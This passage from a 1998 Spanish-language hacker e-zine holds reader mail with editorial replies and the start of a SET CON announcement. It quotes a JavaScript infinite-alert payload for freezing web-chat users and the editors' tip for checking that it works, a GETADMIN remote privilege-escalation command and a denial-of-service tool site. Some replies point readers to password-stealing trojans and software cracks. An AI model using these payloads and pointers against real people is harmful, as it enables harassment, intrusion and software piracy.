  1893.   Por favor, envieme su respuesta lo mas pronto posible.
  1894.  
  1895.   Atte Zeus 
  1896.  
  1897.   <------>
  1898.  
  1899.   [ Pues con esa filosofia que tienes no llegaras muy lejos que digamos,
  1900.     ya que el hacking no consiste en entrar en computadoras ajenas y
  1901.     que el dueño no se de cuenta. Haver si lees este ezine con mas
  1902.     claridad. ]
  1903.  
  1904. <────────────────────────────────────────────────────────────────────────────>
  1905.  
  1906.   Date:  Sun, 26 Apr 1998 17:04:13 GMT  
  1907.   From:  "Ferran Fontcuberta ( Vs )" <versus@xxxxxxxxxxxxxx>      
  1908.   To:  jjf_team@usa.net  
  1909.   Subject:  Pos vaya ;-)  
  1910.  
  1911.   Pues... una sugerencia, podrias comprimir la revista en zip o gz o... ya 
  1912.   que okupa menos y se tarda menos en bajar (aunke tengan el mismo tamaño) 
  1913.  
  1914.   Tanxs. 
  1915.  
  1916.   Vs 
  1917.   versus@xxxxxxxxxxxxxx 
  1918.   com 
  1919.  
  1920.   <------>
  1921.  
  1922.   [ No me digas!!, pero como ya hemos dicho en alguna ocasion no queremos
  1923.     comprimirla ya que asi es llegar y leer. ]
  1924.  
  1925. <────────────────────────────────────────────────────────────────────────────>
  1926.  
  1927.   Date:  Thu, 30 Apr 1998 12:24:38 GMT  
  1928.   From:  "Francisco Rodriguez Casal (Pac\4s)" <pacs@xxxxxxxxxxxxxx>      
  1929.   To:  conde_vampiro@usa.net  
  1930.   Subject:  Copiar diskettes  
  1931.  
  1932.   Hola: 
  1933.  
  1934.   Os queria pedir ayuda. 
  1935.  
  1936.   Quiero copiar un diskette que esta protegido contra copia. Se trata de 
  1937.   un programa reciente que incluye un diskette llave (ellos le llaman 
  1938.   TOKEN) creo que la proteccion consiste en un error de sector 
  1939.   intencionado en la pista 28 cara 1 el cual no es reproducido en el disco 
  1940.   destino pot los copiones. 
  1941.  
  1942.   He intentado copiar el diskette con varios copiones y no lo he 
  1943.   conseguido. Tampoco controlo mucho del tema. 
  1944.  
  1945.   Por supuesto, no pretendo piratear ningun programa, lo que intento es 
  1946.   hacer una copia de seguridad de dicho disquete ya que si se daña pierdo 
  1947.   la licencia. ;-) 
  1948.  
  1949.   Gracias. 
  1950.  
  1951.   Un saludo. 
  1952.  
  1953.   __________________________________________________________ 
  1954.   Universidad de La Coruña
  1955.   Servicios Informaticos de Gestion 
  1956.  
  1957.   Francisco Rodriguez Casal 
  1958.   Email: pacs@xxxxxxxxxxxxxx 
  1959.   __________________________________________________________ 
  1960.  
  1961.   <------>
  1962.  
  1963.   [ Un buen copion deberia ser capaz de copiarlo, por lo que deberias seguir
  1964.     buscando alguno que satisfaga tus necesidades. Ademas siempre puedes
  1965.     aplicar "coding rulez" o sea que como crees saber donde esta la proteccion
  1966.     la puedes intentar anular. Pasate por la seccion de crack, para pillar
  1967.     tools para este trabajo. ]
  1968.  
  1969. <────────────────────────────────────────────────────────────────────────────>
  1970.  
  1971.   Date:  Sat, 02 May 1998 10:27:38 GMT  
  1972.   From:  <ardarj@xxxxxxxxxxxxxx>      
  1973.   Subject:  CONSULTA  
  1974.  
  1975.   HOLA J.J.F. SOY FEAR, SUPONGO QUE NO SABEIS QUIEN SOY (SEGURO QUE NO).
  1976.   BUENO, OS PODRIA DECIR QUE SOY UN USUARIO DE INTERNET A QUIEN LE GUSTARIA
  1977.   APRENDER A SER UN HACKER, NO SE SI ESO ES POSIBLE ASI COMO YO LO ESTOY
  1978.   PLANTEANDO, PERO ESPERO QUE PODAIS AYUDARME, DANDOME CONSEJOS Y
  1979.   EXPLICANDOME LAS COSAS QUE DEBO DE HACER, ME REFIERO A QUE VOSOTROS
  1980.   SEREAIS MIS PROFESORES Y YO VUESTRO FIEL ALUMNO. SEGURO QUE RECIBIREIS
  1981.   CIENTOS DE MAIL'S COMO ESTE, PERO YO OS JURO SI ME ENSA╤AIS, VAIS A PODER
  1982.   ESTAR ORGULLOSOS DE MI.
  1983.   DE TODAS FORMAS, ME GUSTARIA FELICITAROS POR LA GRAN PAGINA QUE TENEIS,
  1984.   SEGURO QUE SIRVE DE AYUDA A MUCHAS PERSONAS Y POR ULTIMO ME GUSTARIA QUE
  1985.   AUNQUE PASAEIS DE MI ME ACLARARAIS UNA DUDA:
  1986.  
  1987.   - EN VUESTRA PAGINA HAY UN APARTADO QUE EXPLICA COMO BLOQUEAR UN ORDENADOR
  1988.   A TRAVES DE UN CHAT. YO LO INTENTE HACER DE ESTA FORMA:
  1989.        1.- ME CONECE╔ AL BUSCADOR OLE.
  1990.        2.- LE DI AL APARTADO DE CHAT'S.
  1991.        3.- ESCOGI EL APARTADO "DIVERSION"
  1992.        4.- ESCOGI EN CANAL "AMOR"
  1993.        5.- UNA VEZ DENTRO, HABRO EL CANAL PRIVADO DE OTRO USUARIO.
  1994.        6.- HABLE UN POCO CON EL Y CUANDO PAS╙ DE MI, ESCRIBI LO QUE
  1995.            VOSOTROS DECIAIS QUE HABIA QUE ESCRIBIR O SEA ESTO 
  1996.  
  1997.       <script language=javascript>for(i=1;i<2;) { alert("lo siento tenia que
  1998.       probarlo con alguien")}</script>
  1999.  
  2000.        7.- LE DI AL INTRO Y.... NO PAS╙ ABSOLUTAMENTE NADA, TODO LO QUE
  2001.            HABIA ESCRITO APARECI╙ EN EL CANAL PRIVADO, Y EL TIO ME  
  2002.            PREGUNTO QUE PORQUE HABIA PUESTO ESO. 
  2003.  
  2004.   BUENO ME GUSTARIA QUE SI PODEIS Y QUEREIS ME DIJERAIS QUE ES LO QUE HE
  2005.   HECHO MAL, O LO QUE NO HE HECHO. GRACIAS.
  2006.  
  2007.   EMAIL=  ardarj@xxxxxxxxxxxxxx
  2008.  
  2009.   <------>
  2010.  
  2011.   [ Como ya hemos dicho, no damos clases privadas ni nada por el estilo.
  2012.     Nuestro consejo que es estudies mucho todo lo que puedas. Parece que hay
  2013.     alguna web que enseñan a escribirnos solicitando clases porque todos
  2014.     escribiis lo mismo!!!!.
  2015.     Si hubieras leido el txt con mas cuidado, verias que pone que no siempre
  2016.     funciona debido al CGI de los Web Chat, por eso antes de ejecutar el
  2017.     script, escribe '<' para saber si funciona o no. Lo mas aconsejable es
  2018.     volverse a leer la guia. ]
  2019.  
  2020. <────────────────────────────────────────────────────────────────────────────>
  2021.       
  2022.   From:  <quasar@xxxxxxxxxxxxxx>      
  2023.   To:  mack_crack@usa.net  
  2024.   Subject:  [JAU....]  
  2025.  
  2026.   Hola loco.... 
  2027.  
  2028.   La verdad es ke iba a encriptarlo con pgp pero para decir esta tonteria 
  2029.   paso.... 
  2030.   
  2031.   Solamente era para decirte ke tu gⁿeb es una de las ke hay ke ir 
  2032.   viniendo cada x tiempo para ver las novedades y tal y pascual....por lo 
  2033.   ke en mi opinion, una mas, deberia ser muy dinamica y ligera y asi 
  2034.   daaria gusto en venir...bla bla bla y mas bla.... 
  2035.   
  2036.   Resumiendo mucho ke no tengo ganas de enrollarme: el contenido de la 
  2037.   gⁿeb...muy OK 
  2038.   pero macho......DESCARGALA DE JAVA KE SE HACE ETERNO!!!.... 
  2039.   
  2040.   A lo mejor un poco directo pero claro.....ok?... 
  2041.   
  2042.   por cierto, a ver si podeis re-editar el articulo de Nobody sobre el 
  2043.   netstat y nbtstat ke la peña me pregunta siempre lo mismo y asi, en vez 
  2044.   de enrollarme, le paso el articulo ese...os lo digo a vosotros porke 
  2045.   creo ke teneis contacto....ok? 
  2046.   
  2047.   y ya os enviare algo un dia ke tenga un minimo de ganas ...... 
  2048.   
  2049.   cuidaros y no cerreis los dos ojos al dormir.....;) 
  2050.   
  2051.   contestad en: 
  2052.   
  2053.   quasarr@xxxxxxxxxxxxxx
  2054.   
  2055.   ostias no he utilizao el remailer...psss...da igual...lo dicho.... 
  2056.   
  2057.   QuasaR .......... progressing 
  2058.   
  2059.   ressing 
  2060.   
  2061.   <------>
  2062.  
  2063.   [ Hi
  2064.  
  2065.   Pues si, nuestras webs son de las q cada POCO tiempo se actualizan con mas 
  2066.   ficheros, links y si, tb java. Ya se q se hace eterno, pero si te has leido
  2067.   la segunda pantalla de nuestra web pone entrada CON JAVA y entrada SIN JAVA,
  2068.   o sea q en lo referente a tu consejo de descargarla de java, mmmm, paso, ya
  2069.   he tenido q hacer dos entradas, coje la q mas te convenga ;-). En lo
  2070.   refererente al articulo de Nobody, ya le mandaremos un mail a ver q dice. 
  2071.   Byezz ]
  2072.  
  2073. <────────────────────────────────────────────────────────────────────────────>
  2074.  
  2075.   From:  "Dany" <kawa.saki@xxxxxxxxxxxxxx>      
  2076.   Subject:  Win NT  
  2077.  
  2078.   Hola,
  2079.  
  2080.   Estoy buscando Caballos de Troya.
  2081.   Tanto el codigo ( Para Vbasic o Pascal ) como los programas ya hechos. Es
  2082.   para Win NT, para tomar las claves. Alguna Sugerencia???
  2083.  
  2084.   Dany,
  2085.  
  2086.   CodeBracker en el IRC Hispano 
  2087.  
  2088.   <------>
  2089.  
  2090.   [ Pues de eso alguna cosa hay, lo mejor que puedes hacer es visitar alguna
  2091.     web sobre Hack NT y ya pillaras tools. Para Vbasic si que hemos visto
  2092.     pero en pacal nop. Pillate el winsock caballo de troya. ]
  2093.  
  2094. <────────────────────────────────────────────────────────────────────────────>
  2095.  
  2096.   Date:  Wed, 06 May 1998 09:25:01 GMT  
  2097.   From:  "Sanye" <sanye@xxxxxxxxxxxxxx>      
  2098.   Subject:  hackers JJf Hackers  
  2099.  
  2100.   me gustaria recibir informacion sobre los programas y pasos que tendria
  2101.   que seguir para acceder a sistemas remotos como los ordenadores de mi
  2102.   amigos por ejemplo, o servidores de red de empresas o cosas asin Te pido
  2103.   ayuda ya que seguro que tu sabes cuales son los programas y tambien los
  2104.   pasos a seguir.
  2105.  
  2106.   ea3ckx@xxxxxxxxxxxxxx
  2107.  
  2108.   <------>
  2109.  
  2110.   [ hhuummmm, creo que para eso esta este ezine o sea que lee. ]
  2111.  
  2112. <────────────────────────────────────────────────────────────────────────────>
  2113.  
  2114.   Date:  Mon, 11 May 1998 10:47:55 GMT  
  2115.   From:  chipiona <chipiona@xxxxxxxxxxxxxx>      
  2116.   To:  "'silicio@xxxxxxxxxxxxxx"  
  2117.   Cc:  "'zen@xxxxxxxxxxxxxx"  
  2118.   Subject:  SOLICITO_AYUDA, POR_FAVOR  
  2119.  
  2120.   Imploro a quien me pueda ayudar, que me eche un cble en esto. 
  2121.   Ya se que como indicais en vuestras paginas la mayoria de vosotros, esto es
  2122.   ilegal y solo lo mostrais a efectos educativos, y bajo la responsabilidad
  2123.   del que lo acepte. YO ACEPTO ESA RESPONSABILIDAD. 
  2124.   Os explicare el problema. Tengo una serie de programas demo de gestion de 
  2125.   clinica veterinaria. Todos estan limitados de alguna forma, la mayoria de
  2126.   llos en la cantidad de clientes que les puedo meter (maximo de 25 clientes),
  2127.   y otro que esta limitado por la fecha (1/4/98, que ya tengo controlada
  2128.   mediante el DATE CRACKER), pero tambien esta limitada la base de datos
  2129.   indicandome cuando craqueo la fecha que no puede aceptar el registro porque
  2130.   es superior a los seis meses de evaluacion. 
  2131.   ¿Hay alguna forma o programa que me podais indicar para eliminar estas 
  2132.   limitaciones?. Conque me funcione uno de los programas me avio. 
  2133.  
  2134.   Mi nombre es Jose Javier y mi direccion de correo es como veis 
  2135.   CHIPIONA@xxxxxxxxxxxxxx y no os asusteis del nombre porque es el correo
  2136.   de la oficina donde curro. 
  2137.  
  2138.   GRACIAS A TODOSS 
  2139.  
  2140.   <------>
  2141.  
  2142.   [ Hombre, para empezar son programas demos y esta muy mal por tu parte
  2143.     que los uses para obtener beneficio economico, como estas haciendo. 
  2144.     Lo mejor que puedes hacer para crackearlos, es buscar algun crack
  2145.     especifico para el programa en cuestion. Pasa por nuestra seccion de
  2146.     crack para pillar alguna tool. ]
  2147.  
  2148. <────────────────────────────────────────────────────────────────────────────>
  2149.  
  2150.   Date:  Thu, 07 May 1998 05:13:14 GMT  
  2151.   From:  Marco Demonte <mdemonte@xxxxxxxxxxxxxx>      
  2152.   To:  conde_vampiro@usa.net  
  2153.   Subject:  mmmm.. pena  
  2154.  
  2155.   Sr. Vampiro ;-) 
  2156.  
  2157.   Se que el tiempo que ocupara en leer esto es tiemo perdido pero no hay 
  2158.   otra manera para aprender..... 
  2159.  
  2160.   Como se comienza a crackear.. algun documento para empezar o algo 
  2161.   asi.. Ya que estoy interesado en eso por que tengo una lista ... 
  2162.  
  2163.   Le comento que soy de Mexico y hace un par de años estuve estudiando 
  2164.   mucho respecto al phreaking , aqui en Mexico rompiamos con 2600hz y 
  2165.   utilizaba protocolo ccitt r2 por lada 800 nacional, era una maravilla, 
  2166.   tambien con 2600hz para lada 800 internacional y tambein funcionaba.... 
  2167.   Si te interesa podria pasarte algunos tips que en otros paises podrian 
  2168.   funionar como la intervencion de llamadas en sistemas ccirr r2.. 
  2169.  
  2170.   Tambien se algo de cululares.... 
  2171.  
  2172.   Mil gracias por tu tiempo 
  2173.  
  2174.   Marco 
  2175.  
  2176.   <------>
  2177.  
  2178.   [ A que esperas!!!! envia los trucos al ezine ;-) y ya sabes escribe algun
  2179.     articulo de phreak. Para crackear hay varios documentos de como comenzar.
  2180.     Pasate por nuestro web ya que alguno hay disponible. ]
  2181.  
  2182. <────────────────────────────────────────────────────────────────────────────>
  2183.  
  2184.   Date:  Tue, 12 May 1998 17:40:37 GMT  
  2185.   From:  Anonimo <prophet@xxxxxxxxxxxxxx>      
  2186.   To:  jjf_team@usa.net  
  2187.   Subject:  {CyBoRg}, SHG  
  2188.  
  2189.   Hola a todos me parece cojonuda vuestra revista, escribo este mail 
  2190.   para contestar un mail que lei sobre una que decia que querias cosas 
  2191.   de NT, y que el GETADMIN no funciona remotamente. Bueno lo primero, el 
  2192.   getadmin funciona remotamente y lo he probado y va, porque no pruebas 
  2193.   hacer lo siguiente desde MS.DOS: 
  2194.  
  2195.   GETADMIN \\ip\nombre usuario 
  2196.  
  2197.   No se habra ocurrido utilizar el getadmin con el usuario invitado porque 
  2198.   no va con ese usuario. 
  2199.  
  2200.   Cosas de hack de NT, nunca se te ha ocurrido explorar los recursos 
  2201.   compartidos de NT que trae ocultos,, ah pero eso no lo sabiais, :))))). 
  2202.   Hay una buena utilidad por ahi que se llama NAT que os ayudara para el 
  2203.   NBTSTAT famoso, ya que le podreis poner un dicionario y lo pasa. Que mas 
  2204.   utilizar el l0pth, va genial si no tiene instalado el SP3. Hay muchas 
  2205.   cosillas. 
  2206.  
  2207.   Bueno otro asunto comentaba de hacer taeardrop, land, etc en windows, 
  2208.   pues gente es posible hacerlo, hay un sitio que tiene el programilla. 
  2209.  
  2210.   *****Censurad la url si quereis ****** 
  2211.   www.aggressor.net 
  2212.  
  2213.   Bueno gente me despido y o quiero dar mas la tabarra. Hasta otra. Por 
  2214.   cierto cuando metamos los 30 megas de nuestra web, pondremos un link a 
  2215.   vuestro zine, 
  2216.  
  2217.   Ad10, bye 
  2218.  
  2219.   ++++++++++++++++ 
  2220.   {CyBoRg} 
  2221.   SHG..... 
  2222.   ++++++++++++++++ 
  2223.  
  2224.   <------>
  2225.  
  2226.   [ Por fin, los propios lectores se contestan entre si :)))
  2227.     Okis, ya nos pasaras el url del grupo y nosotros tb os pondremos un
  2228.     link. 
  2229.     Thx's por los cumplidos y nos gusta que otros grupos nos saluden, ya
  2230.     sabeis que podeis escribir algun arti, estaremos encantados de
  2231.     publicarlo. Saludos de - J.J.F. / HACKERS TEAM - ]
  2232.  
  2233. <────────────────────────────────────────────────────────────────────────────>
  2234.  
  2235.   From:  "Fco. de Angel Fernandez-Pacheco" <fdeangel@xxxxxxxxxxxxxx>      
  2236.   Subject:  Re: E-Zine  
  2237.  
  2238.   Hola!!!
  2239.   Lo primero es felcitasros por el E-Zine que esta muy guapo, luego otra
  2240.   cosa es si puedo colaborar en traducciones de textos en vuestra pagina.
  2241.   Sludos.
  2242.  
  2243.   DataCrack 
  2244.  
  2245.   <------>
  2246.  
  2247.   [ Pues ya sabes, traduce lo que quieras y lo envias al buzon y lo pondremos
  2248.     en el ezine :), la gente nos pide traducciones de articulos de pkreak,
  2249.     o sea que ya te hemos dado trabajillo.
  2250.     Esta genial que querais colaborar, cuantos mas, mejor para todos. ]
  2251.  
  2252. <────────────────────────────────────────────────────────────────────────────>
  2253.  
  2254.   Date:  Thu, 14 May 1998 03:00:02 GMT  
  2255.   From:  Ayala <ayala@xxxxxxxxxxxxxx>      
  2256.   To:  conde_vampiro@usa.net  
  2257.   Subject:  (sin asunto)  
  2258.  
  2259.   hola, estoy buscando a un maestro, alguien que pueda iniciarme 
  2260.   en la entrada a sistemas informaticos. Si puedes ayudarme, hazmelo 
  2261.   saber, gracias. 
  2262.  
  2263.   <------>
  2264.  
  2265.   [ Ya estamos como siempre!!, que no ayudamos a la gente para que entre
  2266.     en los sistemas ajenos y tampoco damos clases privadas, okis ? ]
  2267.  
  2268. <────────────────────────────────────────────────────────────────────────────>
  2269.  
  2270.   Date:  Wed, 20 May 1998 02:37:32 GMT  
  2271.   From:  "Arturo Villal\sn Villa" <avillalo@xxxxxxxxxxxxxx>      
  2272.   To:  jjf_team@usa.net  
  2273.   Subject:  Problemas con algunas de sus secciones  
  2274.  
  2275.   Tengo problemas al intentar bajar algunos de los archivos de su pagina 
  2276.   estos son: 
  2277.   Seccisn HACK Novell (no se puede obtener ninguna utileria) 
  2278.   Utilidades de Encripcisn (no se puede obtener ninguna utileria) 
  2279.   Utilidades Network-Hacking (no se puede obtener ninguna utileria) 
  2280.  
  2281.   ? Que es lo que esta pasando en sus servidores o cual es la razsn de 
  2282.   este problema ? 
  2283.  
  2284.   ? Tienen una direccisn FTP para obtener mas rapidamente estas utilerias 
  2285.   asm como los archivos de Virus Informaticos, de ser asm, podrman darme 
  2286.   la direccisn para tomarlos ? 
  2287.  
  2288.   Saludos 
  2289.  
  2290.   <------>
  2291.  
  2292.   [ Es normal que siempre haya algun enlace que no este disponible, ya que el
  2293.     web es muy dinamico, ademas que algunas de esas secciones que mencionas
  2294.     hay un MENSAJE QUE PONE QUE DE MOMENTO ESTA OFF-LINE , pero en fin ...
  2295.     Las razones son muy variadas, por desgracia, pero procuramos estar siempre
  2296.     con lo mejor y mas actualizado ;-) Sobre virus tienes la seccion de
  2297.     virus que seguro te gustara. ]
  2298.  
  2299. <────────────────────────────────────────────────────────────────────────────>
  2300.  
  2301.   Date:  Wed, 20 May 1998 07:34:44 GMT
  2302.   From:  "David Gallego Laredo" <dgall@xxxxxxxxxxxxxx>      
  2303.   Subject:  listado unfrateful.java  
  2304.  
  2305.   EN PRIMER LUGAR ME GUSTARIA FELICITAROS POR VUESTRO E-ZINE, ES EL MEJOR QUE 
  2306.   HE LEIDO HASTA EL MOMENTO EN CASTELLANO, SOY UN AFICIONADO AL HACK Y 
  2307.   DESEARIA COMENTAROS UN PROBLEMA QUE ME HA SURGIDO CON UNO DE LOS LISTADOS 
  2308.   EN JAVA PUBLICADOS EN VUESTRO CUARTO E-ZINE. EN CONCRETO SE TRATA DEL 
  2309.   "UNGRATEFUL.JAVA" EN EL CUAL MEDA UN ERROR AL COMPILARLO CON EL VISUAL J++ 
  2310.   1.1. 
  2311.  
  2312.   EL ERROR ES EN LA INSTRUCCION: 
  2313.   ErrorMessage err = new ErrorMessage(); 
  2314.  
  2315.   ME DICE QUE NO HE DEFINIDO LA CLASE ErrorMessage. 
  2316.   NO SE NADA DE JAVA DE MOMENTO, Y ESPERO ME PODAIS HECHAR UNA MANO PARA QUE 
  2317.   ESTE PROGRAMA FUNCIONE Y PODER PROBARLO Y ESPERIMENTAR UN POCO CON EL. 
  2318.  
  2319.   ESPERO NOTICIAS VUESTRAS, GRACIAS Y HASTA OTRA. 
  2320.  
  2321.   <------>
  2322.  
  2323.   [ Pues definela ;-) por ejemplo, pero lo mejor es que pilles algun libro o
  2324.     busques algun curso de Java por la Red, que te pueda ayudar.
  2325.     Thx por los cumplidos :) ]
  2326.  
  2327. <────────────────────────────────────────────────────────────────────────────>
  2328.  
  2329.   Date:  Sat, 23 May 1998 23:43:47 GMT  
  2330.   From:  Edgardo Mayer <horizonte@xxxxxxxxxxxxxx>      
  2331.   Subject:  INFO  
  2332.  
  2333.   Podrmas darme direcciones de E-mail de colegas-hackers argentinos. 
  2334.   Busco sean argentinos por la parte de la telefonma se 
  2335.   refiere(phreakers). 
  2336.  
  2337.   Gracias y ixitos 
  2338.  
  2339.   Edgardo 
  2340.  
  2341.   <------>
  2342.  
  2343.   [ Pues nosotros no conocemos ningun phreaker o hacker argentino, pero
  2344.     si alguien lo es, que nos envie un mail y os pondremos en contacto,
  2345.     okis ? ;-) ]
  2346.  
  2347. <────────────────────────────────────────────────────────────────────────────>
  2348.  
  2349.   From:  "raul diaz" <rul_diaz@xxxxxxxxxxxxxx>
  2350.   To:  jjf_team@usa.net  
  2351.   Subject:  Saludos...!!!  
  2352.  
  2353.   Antes que nada los felicito por su pagina, son muy interesantes los 
  2354.   temas que ahi describen... 
  2355.  
  2356.   f e l i c i d a d e s . . . ! ! ! 
  2357.  
  2358.   Les escribe un fiel aficionado a los hackers, pero apenas soy un bebe en 
  2359.   esto, por eso les escribo para pedirles que hechen una mano, y me 
  2360.   enseñen a hacer esto... 
  2361.  
  2362.   Donde yo trabajo, hay una gran red de tipo T1, espero me puedan mandar 
  2363.   algo de informacion para hacer algo por aca.... 
  2364.  
  2365.   Tambien quisiera (si no es mucha molestia) que me ense±aran desde lo 
  2366.   basico, como les digo soy un fiel aficionado y me fascina esto... 
  2367.  
  2368.   Como ustedes dicen: La informacion viaja y es libre.... (claro sin dañar 
  2369.   a nadie). 
  2370.  
  2371.   Bueno, espero me contesten..... 
  2372.  
  2373.   atte: Un ser al que le gusta la superacion.... Slash. ;-) 
  2374.  
  2375.   <------>
  2376.  
  2377.   [ Thx :) pero como siempre nuestro consejo que es leas este ezine con
  2378.     mucha atencion y experimentes por tu cuenta. ]
  2379.  
  2380. <────────────────────────────────────────────────────────────────────────────>
  2381.  
  2382.   Date:  Tue, 26 May 1998 22:18:36 GMT  
  2383.   From:  cubikice@xxxxxxxxxxxxxx      
  2384.   To:  jjf_team@usa.net  
  2385.   Subject:  Holas!! estoy vivo!! :-)  
  2386.  
  2387.   Hola!! 
  2388.   Queria responderos al mail que me enviasteis hace + o - una semana 
  2389.   en la que me deciais que ibais a publicar mi articulo y nada, que queria 
  2390.   daros las gracias, estoy preparando otro articulo, este de mi cosecha 
  2391.   aunque no se si os lo llegare a enviar, lo veo un tanto verde 
  2392.   El caso es que ahora mi placa base se la he tenido que dejar a mi novia :-) 
  2393.   total que estoy tirando de 486 y no puedo enchufar mis HD's de siempre 
  2394.   asi que os envio esto desde la web y con el LYNX, joder! 
  2395.   (y es que tampoco tengo CD-ROM), total que voy con un Linux descafeinado 
  2396.   y totalmente desconfigurado, menos mal que aun asi voy haciendo cosillas. 
  2397.   Bueno, no os pego mas la paliza, vais alguna vez por el IRC? me gustaria
  2398.   chtear un rato con alguno de vosotros algun dia. 
  2399.   Pues nada, eso es todo. 
  2400.   Un saludo!! cubikice@xxxxxxxxxxxxxx 
  2401.  
  2402.   <------>
  2403.  
  2404.   [ Okis, y estamos esperando ese arti :) siempre puede ser util para alguien
  2405.     y eso es lo que pretendemos en este ezine.
  2406.     Sobre lo de IRC, pues no, ya que no nos interesa mucho. Para estar
  2407.     en contacto con nosotros pues E-mail :) ]
  2408.  
  2409. <────────────────────────────────────────────────────────────────────────────>
  2410.  
  2411.   Date:  Fri, 29 May 1998 20:51:46 GMT  
  2412.   From:  RAFAEL TREJO OLVERA <a75878@xxxxxxxxxxxxxx>      
  2413.   To:  jjf_team@usa.net  
  2414.   Subject:  Zic  
  2415.  
  2416.   Hola quisiera que me ayudaran para poder ser un hacker. 
  2417.   Mi e-mail es Zic97@xxxxxxxxxxxxxx 
  2418.   De cualquier manera mandemen informacion sobre hackers o programas. 
  2419.   y les pido la direccion de un chat de hackers. 
  2420.  
  2421.   <------>
  2422.  
  2423.   [ Pues como ya hemos repetido tantas veces lee este ezine y nosotros no
  2424.     podemos enviar nada a nadie, okis ?
  2425.  
  2426.     #hacker
  2427.     #hack
  2428.     #hack_novatos
  2429.     #hackers
  2430.     #hack_the_world
  2431.     #hackgov ]
  2432.  
  2433. <────────────────────────────────────────────────────────────────────────────>
  2434.  
  2435.   Date:  Wed, 27 May 1998 13:23:08 GMT  
  2436.   From:  Liang Xiao Zhu <casazhu@xxxxxxxxxxxxxx>      
  2437.   To:  conde_vampiro@usa.net  
  2438.   Subject:  Un saludo  
  2439.  
  2440.   Hola conde vampiro, quiero que me enseñes como entrar al ordenador de 
  2441.   otra persona. 
  2442.   No voy ha hacer nada ilegar solo soy cybernauta que quiere aprender algo 
  2443.   mas, gracias. 
  2444.  
  2445.   <------>
  2446.  
  2447.   [ Pues como siempre decimos no damos clases privadas y YA ESTA BIEN DE
  2448.     RECIBIR ESTE TIPO DE MAIL'S, OKIS ? Para eso tienes vuestro/nuestro
  2449.     ezine.  ]
  2450. <────────────────────────────────────────────────────────────────────────────>
  2451.  
  2452.   Date:  Thu, 04 Jun 1998 04:32:33 GMT  
  2453.   From:  "Damian Broy" <dbroy@xxxxxxxxxxxxxx>      
  2454.   To:  jjf_team@usa.net  
  2455.   Subject:  sugerencia.....  
  2456.    
  2457.   Hola muchachos, visite su page en la red y me percate de que en la 
  2458.   seccion de boxes hay un error en la Blotto Box. Esta solo sirve para 
  2459.   paralizar (o hacer mierda, anyway) toda una zona correspondiente 
  2460.   a un prefijo de caracterisitica telefonica, por medio del simpatico 
  2461.   envio de un gran flujo electrico a travez de la linea telefonica. 
  2462.   Espero haber sido util y los felicito por su pagina, si mi 
  2463.   interpretacion fue considerada erronea por uds pido disculpas. 
  2464.   suerte!!!!!! 
  2465.   Cook2. 
  2466.  
  2467.   Damian Broy 
  2468.  
  2469.   dbroy@xxxxxxxxxxxxxx 
  2470.  
  2471.   <------>  
  2472.  
  2473.   [Thx por la informacion. Prometemos cambiarlo lo antes posible. Y no te
  2474.   preocupes, tu interpretacin es correcta, cualquiera puede tener fallos
  2475.   :-) ]
  2476.  
  2477.  
  2478. <────────────────────────────────────────────────────────────────────────────>
  2479. ██████████████████████████████████████████████████████████████████████████████
  2480. <────────────────────────────────────────────────────────────────────────────>
  2481.  
  2482.                            ------------------------
  2483.                            - NOTICIAS UNDERGROUND -
  2484.                            ------------------------
  2485.   
  2486.                                                 - J.J.F. / HACKERS TEAM -
  2487.  
  2488. <────────────────────────────────────────────────────────────────────────────>
  2489.  
  2490.   I JORNADAS SOBRE SEGURIDAD EN LAS NUEVAS TECNOLOGIAS 
  2491.  
  2492.   14, 15 y 16 de Agosto 
  2493.   Madrid 
  2494.   _ _ _ _ _ _ _ _ _ 
  2495.   _.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-._.-' `-.._ 
  2496.  
  2497.   Durante mucho tiempo hemos notado la falta de unas jornadas de estas 
  2498.   caracteristicas, en las que se acercara a la gente de a pie los aspectos 
  2499.   man interesantes de la seguridad informatica y las telecomunicaciones. 
  2500.  
  2501.   Por primera vez en Espa±a queremos organizar estas jornadas que den 
  2502.   pie a la realizacion de otras muchas y que esperamos tengan su continuidad 
  2503.   en proximos a±os. 
  2504.  
  2505.   Para eso contamos con el respaldo oficial de la asociacion de estudiantes 
  2506.   ACD, a la que desde ya agradecemos su participacion y esperamos contar con 
  2507.   ellos en las futuras ediciones de SET CON 
  2508.  
  2509.  
  2510.   -[ QUE ES SET CON ]- 
  2511.  
  2512.   SET CON no es ni mas ni menos que una reunion de gente interesada en los 
  2513.   temas de seguridad en redes, seguridad informatica, programacion, 
  2514.   comunicaciones... 
  2515.  
  2516.   Para estas primeras jornadas disponemos de un ciclo de conferencias, 
  2517.   nuestra Secure Party, proyecciones de video, concursos, y el resto de 
  2518.   actividades que se nos vayan ocurriendo. Para ello, necesitamos de vuestra 
  2519.   colaboracion. 
  2520.  
  2521.  
  2522.   -[ CONFERENCIAS ]- 
  2523.  
  2524.   En un principio estan previstas tres conferencias o debates por dia, 
  2525.   exceptuando el domingo, en el que solo habra una conferencia. 
  2526.  
  2527.   En el momento de escribir este anuncio tenemos preparadas estas 
  2528.   conferencias: 
  2529.  
  2530.   * "Seguridad en Windows NT" 
  2531.   Conferencia en la que Chessy nos hablara del sistema 
  2532.   operativo Windows NT. 
  2533.  
  2534.   * Legislacion y delito informatico 
  2535.   * Virus 
  2536.   Posible participacion de Anyware y Panda. Nos gustaria 
  2537.   que la gente del 29A tambien participase. 
  2538.   * ... 
  2539.  
  2540.   Los que esteis interesados en participar en alguna conferencia o alguna 
  2541.   mesa redonda, escribid a <setcon@bigfoot.com>, indicando claramente sobre 
  2542.   que quereis hablar, que dias teneis disponible, y cual es vuestro nombre. 
  2543.  
  2544.  
  2545.   -[ CAMPEONATOS ]- 
  2546.  
  2547.   Para demostrar nuestros conocimientos o simplemente pasar un buen rato, 
  2548.   con la posibilidad de importantes premios. 
  2549.  
  2550.   { Trivial Security Edition } 
  2551.  
  2552.   Que decir sobre este entretenido juego de toda la vida. Pon a prueba 
  2553.   tus conocimientos en los mas diversos temas como criptografia, 
  2554.   sistemas operativos, protocolos, lenguajes de programacion, 
  2555.   telefonia o hardware. Quien sera el ganador??? 
  2556.  
  2557.   { Campeonato de Quake } 
  2558.  
  2559.   Nada que ver con la seguridad, pero si con pasar un buen rato. 
  2560.   Simplemente por eliminacion, a ver quien es el mas violento, el mas 
  2561.   listo, el mas... Quake 
  2562.  
  2563.   { Barricada } 
  2564.  
  2565.   El campeonato mas interesante de todos. Coge tu equipo y conectalo 
  2566.   a la red barricada. Lo unico que tienes que hacer es conseguir 
